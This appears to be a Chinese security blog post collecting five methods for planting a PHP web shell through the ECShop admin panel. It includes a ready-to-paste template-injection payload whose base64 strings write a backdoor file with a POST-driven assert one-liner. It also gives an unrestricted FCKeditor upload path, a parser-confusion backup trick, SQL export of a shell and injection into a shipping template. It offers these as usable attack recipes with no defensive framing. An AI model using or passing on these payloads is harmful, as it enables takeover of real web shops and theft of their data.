ecshop后台getshell方法集合
首页 > web安全 > 小技巧    作者:webbaozi   2016年11月29日 12:18 星期二   热度:2371°   百度已收录  
时间:2016-11-29 12:18   热度:2371° 

姿势来源互联网,只是做个整理~~


1.

模板管理--语言项编辑

如:user.php 搜索:状态

插入${${fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgQGFzc2VydCgkX1BPU1RbJ3onXSk7Pz4))}}

访问http://localhost/languages/zh_cn/user.php

一句话:http://localhost/languages/zh_cn/fuck.php密码z


2.如果

进入后台-系统设置-Flash播放器管理存在

可以上传任意文件。

[includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制,直接Type=Media 上传你的webshell,访问路径为http://target/images/upload/Media/xxx.php]


3.如果目标服务器存在解析漏洞或者是apache


去前台留言,内容为一句话,然后选中ecs_feedback这张表进行备份。1.php;.sql(解析漏洞)1.php.sql(apache不识别sql,会当做前面的.php来执行)


4.如果sql权限够大,可以使用后台中的sql语句导出一句话


5.进入后台->设置模板->选择配送方式->底行加入一句话代码

然后访问:http://127.0.0.1/myship.php


二维码加载中...
本文作者:webbaozi      文章标题: ecshop后台getshell方法集合
本文地址:http://www.webbaozi.com/qjyq/21.html
版权声明:若无注明,本文皆为“baozi|学与用”原创,转载请保留文章出处。

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1